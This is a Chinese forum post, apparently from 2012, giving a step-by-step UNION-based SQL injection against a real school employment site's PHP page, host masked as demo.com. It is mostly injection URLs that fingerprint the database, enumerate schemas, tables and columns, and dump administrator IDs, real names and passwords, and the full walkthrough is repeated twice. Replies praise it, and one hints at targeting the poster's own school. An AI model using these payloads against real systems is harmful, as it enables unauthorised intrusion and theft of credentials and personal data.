-
-
[旧帖] [原创]学校就业网一次PHP SQL注入全过程 0.00雪花
-
发表于: 2012-6-10 21:14
-
说明:本文的测试地址,我全部都给予替换成http://www.demo.com,忘原谅。还有本文中难免会有错误,请指正!
下面正式开始了。
第一步:判断是否存在注入漏洞/**/and/**/1=1和/**/and/**/1=2,如果前者正常显示,后者不能正常显示,说明存在漏洞。(当然判断是否存在漏洞的原因有很多)如图所示。
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=1--
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2--
第二步:猜字段个数,使用/**/order/**/by ,这里44报错,43未报错,说明是43个字段,如图所示,如果不理解,可以通过mysql进行sql语句测试,就明白了。
http://www.demo.com/showcompany.php?comRegid=299/**/order/**/by 44--
http://www.demo.com/showcompany.php?comRegid=299/**/order/**/by 43
第三步:使用and 1=2 union select 对应字段个数,其实这里除了and 1=1 为真外,可以换成别的如and 1=0,and 1=2等,或者可以将comRegid=299改为comRegid=数字(非299,好像在前面加个-后也行,如:-299)来替换 and 1=2 (为假);只要把前面弄成假,把后面的东西在前面表中显示(具体测试大家可以去mysql中测试) ,如图所示,说明2,4,6可以显示信息,这次大多数选择了6,可能是它的位置比较大吧。结果显示如下
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2/**/union/**/ select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
第四步:可以用version(),user(),database(),@@global.version_compile_os等进行获取系统相关信息。其中concat()是将它们连接起来,0x3c62723e代表回车。结果显示如下。
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2/**/union/**/ select/**/1,2,3,4,5,concat(version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@global.version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
第五步:爆出所有数据名,结果如下,其实这步可以不做,因为上一步已经把数据库名爆出来了。
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/table_schema),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns—
第六步:爆出所有表名,结果如下0x586F627为数据库名,这里转换为了十六进制
http://www.demo.com/showcompany.php?comRegid=299%20/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/table_name,0x3c62723e),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns/**/where/**/table_schema=0x586F6276E636875--
第七步:用同样的方法,爆出相应表的所有字段,结果如下显示
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/column_name,0x3c62723e),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns/**/where/**/table_name=0x246D696E5F73746174—
第八步:爆出相应内容来,结果如下
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(userid, realname ,0x5f,password),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/stud_admin/*
其中用到的一些函数不懂的可以进一步去百度或google查询。谢谢!
整理的DOC文件 学校就业网sql注入漏洞全过程pediy.doc
下面正式开始了。
第一步:判断是否存在注入漏洞/**/and/**/1=1和/**/and/**/1=2,如果前者正常显示,后者不能正常显示,说明存在漏洞。(当然判断是否存在漏洞的原因有很多)如图所示。
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=1--
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2--
第二步:猜字段个数,使用/**/order/**/by ,这里44报错,43未报错,说明是43个字段,如图所示,如果不理解,可以通过mysql进行sql语句测试,就明白了。
http://www.demo.com/showcompany.php?comRegid=299/**/order/**/by 44--
http://www.demo.com/showcompany.php?comRegid=299/**/order/**/by 43
第三步:使用and 1=2 union select 对应字段个数,其实这里除了and 1=1 为真外,可以换成别的如and 1=0,and 1=2等,或者可以将comRegid=299改为comRegid=数字(非299,好像在前面加个-后也行,如:-299)来替换 and 1=2 (为假);只要把前面弄成假,把后面的东西在前面表中显示(具体测试大家可以去mysql中测试) ,如图所示,说明2,4,6可以显示信息,这次大多数选择了6,可能是它的位置比较大吧。结果显示如下
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2/**/union/**/ select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
第四步:可以用version(),user(),database(),@@global.version_compile_os等进行获取系统相关信息。其中concat()是将它们连接起来,0x3c62723e代表回车。结果显示如下。
http://www.demo.com/showcompany.php?comRegid=299/**/and/**/1=2/**/union/**/ select/**/1,2,3,4,5,concat(version(),0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@global.version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
第五步:爆出所有数据名,结果如下,其实这步可以不做,因为上一步已经把数据库名爆出来了。
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/table_schema),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns—
第六步:爆出所有表名,结果如下0x586F627为数据库名,这里转换为了十六进制
http://www.demo.com/showcompany.php?comRegid=299%20/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/table_name,0x3c62723e),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns/**/where/**/table_schema=0x586F6276E636875--
第七步:用同样的方法,爆出相应表的所有字段,结果如下显示
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(DISTINCT/**/column_name,0x3c62723e),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/information_schema.columns/**/where/**/table_name=0x246D696E5F73746174—
第八步:爆出相应内容来,结果如下
http://www.demo.com/showcompany.php?comRegid=299 /**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,concat(0x5B,GROUP_CONCAT(userid, realname ,0x5f,password),0x5D),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/from/**/stud_admin/*
其中用到的一些函数不懂的可以进一步去百度或google查询。谢谢!
整理的DOC文件 学校就业网sql注入漏洞全过程pediy.doc
|
|
|---|---|
|
|
|
|
|
笑过。
|
|
|
|
|
|
|
|
|
不错啊,楼主历害,
 今天第一次看到关入SQL注入的详细文章,最近经常听说很多站的数据库出问题,原来就是这样弄来的。
|
|
|
|
|
|
|
|
|
|
|
|
赞一个~很详细~
这个网站做的... 
|
|
|
|
|
|
|
|
|
 我们学校的都是.net的。。。暂时还无从下手
|
|
|
|
